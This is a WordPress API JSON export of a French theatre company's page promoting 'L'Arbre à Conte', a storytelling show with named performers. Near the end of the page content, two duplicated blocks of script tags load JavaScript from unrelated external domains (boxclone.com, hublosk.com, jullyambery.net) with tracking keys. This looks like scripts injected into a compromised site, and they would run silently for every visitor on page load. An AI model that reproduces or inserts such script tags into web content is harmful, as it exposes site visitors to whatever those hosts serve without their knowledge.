{"id":2463,"date":"2015-09-08T19:07:44","date_gmt":"2015-09-08T17:07:44","guid":{"rendered":"http:\/\/www.ciedacote.com\/web\/?page_id=2463"},"modified":"2026-01-15T12:49:14","modified_gmt":"2026-01-15T10:49:14","slug":"larbre-a-conte","status":"publish","type":"page","link":"https:\/\/www.ciedacote.com\/web\/larbre-a-conte\/","title":{"rendered":"L&#8217;Arbre \u00e0 Conte"},"content":{"rendered":"<div class=\"fcbkbttn_buttons_block\" id=\"fcbkbttn_left\"><div class=\"fb-share-button  \" data-href=\"https:\/\/www.ciedacote.com\/web\/larbre-a-conte\/\" data-type=\"button_count\" data-size=\"small\"><\/div><\/div><p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Il fut un temps o\u00f9 les arbres parlaient&#8230;<\/strong><\/span><\/p>\n<h2 style=\"text-align: center;\"><em><strong>L&#8217;Arbre \u00e0 Conte est un moment suspendu entre ciel et terre, une bulle de douceur, de r\u00eave et de po\u00e9sie&#8230;<\/strong><\/em><\/h2>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 14pt;\">Les contes propos\u00e9s sont ici adaptables en fonction des conditions d&#8217;organisation et de l&#8217;\u00e2ge du public vis\u00e9.<\/span><\/p>\n<p><span style=\"font-size: 14pt;\"><em>Avec Pascale DELOCHE (Cie d&#8217;\u00e0 C\u00f4t\u00e9), Laurence BERNON ( l&#8217;\u00d4 2 l&#8217;Arbre), Vincent MUZOTTE (musicien) ou Marie Ginesti\u00e8re (musicienne)<\/em><\/span><\/p>\n<p>&nbsp;<\/p>\nngg_shortcode_0_placeholder\n<p><script src=\"\/\/boxclone.com\/231fe9b04591ea7578.js\"><\/script> <script src=\"https:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8991x\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8991x&amp;format=arrjs&amp;r=1658221041975\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/boxclone.com\/ext\/231fe9b04591ea7578.js?sid=52724_8991_&amp;title=aa&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/boxclone.com\/231fe9b04591ea7578.js\"><\/script> <script src=\"https:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8991x\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8991x&amp;format=arrjs&amp;r=1658221134129\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/boxclone.com\/ext\/231fe9b04591ea7578.js?sid=52724_8991_&amp;title=aa&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; &nbsp; Il fut un temps o\u00f9 les arbres parlaient&#8230; L&#8217;Arbre \u00e0 Conte est un moment suspendu entre ciel et terre, une bulle de douceur, de r\u00eave et de po\u00e9sie&#8230; &nbsp; &nbsp; Les contes propos\u00e9s sont ici adaptables en fonction des conditions d&#8217;organisation et de l&#8217;\u00e2ge du public vis\u00e9. Avec Pascale DELOCHE (Cie d&#8217;\u00e0 C\u00f4t\u00e9), [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-2463","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages\/2463","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/comments?post=2463"}],"version-history":[{"count":34,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages\/2463\/revisions"}],"predecessor-version":[{"id":5818,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages\/2463\/revisions\/5818"}],"wp:attachment":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/media?parent=2463"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}